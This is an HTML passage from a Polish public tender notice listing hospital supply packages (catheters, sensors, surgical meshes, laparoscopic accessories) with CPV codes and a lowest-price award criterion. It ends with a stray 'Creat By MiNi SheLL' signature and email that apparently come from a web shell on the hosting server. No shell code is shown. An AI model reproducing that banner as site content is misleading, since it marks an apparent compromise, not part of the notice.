<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet VII - Akcesoria do EKG i USG w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet VIII - Papiery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet VIII - Papiery w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet IX - Próżnociągi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet IX - Próżnociągi w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet X - Cewniki, obwody, filtry.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet X - Cewniki, obwody, filtry w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.14.16.20-2, 33.19.00.00-8, 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet XI - Sprzęt anestezjologiczny, ostrza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet XI - Sprzęt anestezjologiczny, ostrza w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.14.16.20-2, 33.19.00.00-8, 33.14.14.11-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet XIIA - Czujniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet XIIA - Czujniki w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet XIIB - Czujniki typu Masimo lub równoważne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet XIIB - Czujniki typu Masimo lub równoważne w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet XIII - Staplery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet XIII - Staplery w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet XIV-Siatki chirurgiczne do laparoskopowego leczenia przepuklin, narzędzie do pokrywania otrzewna wszczepionej siatki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet XIV - Siatki chirurgiczne do laparoskopowego leczenia przepuklin, narzędzie do pokrywania otrzewna wszczepionej siatki w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet XV	 -Siatki chirurgiczne częściowo wchłanialne do operacyjnego leczenia przepuklin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet XV	 - Siatki chirurgiczne częściowo wchłanialne do operacyjnego leczenia przepuklin w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet XVI - Oprzyrządowanie do posiadanej diatermii Aesculap lub równoważne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet XVI - Oprzyrządowanie do posiadanej diatermii Aesculap lub równoważne w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet XVII - Akcesoria laparoskopowe do posiadanych narzędzi f-my RUDOLF lub równoważne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet XVII - Akcesoria laparoskopowe do posiadanych narzędzi f-my RUDOLF lub równoważne w asortymencie oraz ilościach maksymalnych określonych w Załączniku nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com